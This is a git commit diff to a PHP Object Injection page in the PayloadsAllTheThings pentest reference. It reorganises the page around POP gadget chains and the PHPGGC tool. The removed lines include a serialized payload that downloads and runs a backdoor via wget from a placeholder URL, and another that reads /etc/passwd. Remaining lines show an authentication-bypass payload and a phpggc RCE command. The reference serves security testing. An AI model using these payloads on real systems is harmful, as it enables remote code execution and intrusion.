PHP POP Chain

This commit is contained in:
Swissky 2020-09-10 15:15:53 +02:00
parent ddabfd7531
commit 543f63d7de

View File

@ -10,7 +10,16 @@ The following magic methods will help you for a PHP Object injection
Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection. Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection.
## __wakeup in the unserialize function ## Summary
* [General concept](#general-concept)
* [Authentication bypass](#authentication-bypass)
* [Finding and using gadgets](#finding-and-using-gadgets)
* [Real world examples](#real-world-examples)
* [References](#references)
## General concept
Vulnerable code: Vulnerable code:
@ -38,7 +47,7 @@ Vulnerable code:
?> ?>
``` ```
Payload: Craft a payload using existing code inside the application.
```php ```php
# Basic serialized data # Basic serialized data
@ -102,36 +111,10 @@ Payload:
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
``` ```
## Others exploits
Reverse Shell
```php
class PHPObjectInjection
{
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('wget http://URL/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
echo urlencode(serialize(new PHPObjectInjection));
```
Basic detection
```php
class PHPObjectInjection
{
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('cat /etc/passwd');";
}
echo urlencode(serialize(new PHPObjectInjection));
//O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A26%3A%22system%28%27cat+%2Fetc%2Fpasswd%27%29%3B%22%3B%7D
//'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}'
```
## Finding and using gadgets ## Finding and using gadgets
Also called "PHP POP Chains", they can be used to gain RCE on the system.
[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: [PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
- Laravel - Laravel
@ -165,3 +148,4 @@ phpggc monolog/rce1 'phpinfo();' -s
* [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d) * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)
* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web) * [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41) * [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)